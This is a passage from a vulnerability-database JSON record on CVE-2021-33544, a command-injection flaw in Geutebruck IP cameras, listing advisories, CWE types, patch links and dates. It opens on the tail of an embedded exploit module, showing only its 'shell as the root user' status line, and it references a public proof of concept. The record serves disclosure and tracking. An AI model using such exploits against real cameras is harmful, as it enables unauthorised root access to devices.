print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n end\nend\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33544"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "VULMON",
"id": "CVE-2021-33544"
},
{
"db": "PACKETSTORM",
"id": "164036"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-33544",
"trust": 2.7
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-03",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "164036",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU97817785",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-05",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023",
"trust": 0.8
},
{
"db": "CXSECURITY",
"id": "WLB-2021090031",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021072807",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2550",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2093",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021041363",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-33544",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33544"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2093"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33544"
}
]
},
"id": "VAR-202109-0597",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T21:21:41.117000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
"trust": 0.8,
"url": "https://portal.geutebrueck.com/"
},
{
"title": "Geutebr\u00fcck G-Cam E2 and G-Code Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=158073"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2093"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "Command injection (CWE-77) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33544"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
},
{
"trust": 1.6,
"url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu97817785/"
},
{
"trust": 0.8,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
},
{
"trust": 0.7,
"url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2021090031"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework"
},
{
"trust": 0.1,
"url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],"
},
{
"trust": 0.1,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
},
{
"trust": 0.1,
"url": "https://metasploit.com/download"
},
{
"trust": 0.1,
"url": "http://geutebruck.com\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33544"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2093"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33544"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33544"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2093"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33544"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2021-09-02T15:36:40",
"db": "PACKETSTORM",
"id": "164036"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2093"
},
{
"date": "2021-04-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2021-09-13T18:15:21.130000",
"db": "NVD",
"id": "CVE-2021-33544"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-29T08:30:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2022-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2093"
},
{
"date": "2021-04-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2023-11-07T03:35:51.497000",
"db": "NVD",
"id": "CVE-2021-33544"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2093"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2093"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…